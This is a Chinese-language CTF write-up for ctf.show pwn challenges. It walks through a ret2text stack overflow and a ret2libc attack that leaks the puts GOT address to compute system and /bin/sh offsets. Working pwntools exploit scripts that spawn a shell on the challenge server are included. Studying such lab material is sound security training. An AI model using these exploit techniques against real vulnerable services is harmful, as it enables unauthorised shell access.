pwn 签到题
nc 连上就有flag
pwn 02
简单的ret2txt
先检验一下文件
是32位文件
且只有堆栈不可执行保护
checksec 结果可参考checksec
在ubuntu上运行
存在栈溢出
用IDApro 32位 打开
首先看main函数
那么接着跟到pwnme函数
可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出
进入char s
可以看到从第一个s开始输入只需输入9+4=13个脏数据
然后加上ret要返回的/bin/sh的地址即可得到shell
需要找到/bin/sh
发现了stack函数 所以只需要将ret指向stack函数首地址即可得到shell
故exp:
from pwn import * content = 1 def main(): if content == 0: p = process("./stack") else : p = remote("pwn.challenge.ctf.show",28137) payload = b‘a‘*13 payload += p32(0x804850F) p.sendline(payload) p.interactive() main()
运行得到flag
pwn 03
ret2libc
同上
堆栈不可执行
拖入IDA,先看main函数
再看pwnme
存在栈溢出 进入s
需要输入9+4=13个脏数据 然后ret指向shellcode "/bin/sh"
但是程序里没有system函数,无法直接调用
这个时候就涉及到plt表和got表了 程序执行后,plt表里是got表的地址,got表是函数的真实地址 程序还未执行时,got表里还是plt表的地址 我们需要泄漏got表里的地址,由于开启了ASLR,本地和远程的地址不一样 但也只是针对于地址中间位进行随机,最低的12位并不会发生改变 也就是我们需要获取到远程环境的函数的真实地址 进而判断libc的版本,计算泄漏的函数got表的地址与system的偏移,然后获取到system函数的真实地址,进而计算system函数与/bin/sh的偏移,最终getshell
我们利用puts函数来进行这一步
exp:
from pwn import * content = 1 def main(): if content == 0: p = process("./stack1") else: p = remote("pwn.challenge.ctf.show",28169) elf = ELF("./stack1") puts_plt = elf.plt[‘puts‘] puts_got = elf.got[‘puts‘] main_addr = elf.symbols[‘main‘] payload = b"a"*13 + p32(puts_plt) + p32(main_addr) + p32(puts_got) p.sendline(payload) p.recvuntil(‘\n\n‘) get_addr = u32(p.recv(4)) print(hex(get_addr))
运行脚本
然后到libcsearch网站 libc database search
输入puts 和 得到地址的后三位
找到对应libc
进入得到偏移信息
最终exp:
from pwn import * content = 1 def main(): if content == 0: p = process("./stack1") else: p = remote("pwn.challenge.ctf.show",28109) elf = ELF("./stack1") puts_plt = elf.plt[‘puts‘] puts_got = elf.got[‘puts‘] main_addr = elf.symbols[‘main‘] payload = b"a"*13 + p32(puts_plt) + p32(main_addr) + p32(puts_got) p.sendline(payload) p.recvuntil(‘\n\n‘) get_addr = u32(p.recv(4)) print(hex(get_addr)) libcbase = get_addr - 0x067360 system_addr = libcbase + 0x03cd10 bin_sh = libcbase + 0x17b8cf payload = flat([b‘A‘*13,system_addr,b‘AAAA‘,bin_sh]) p.sendline(payload) p.interactive()main()
运行脚本得到flag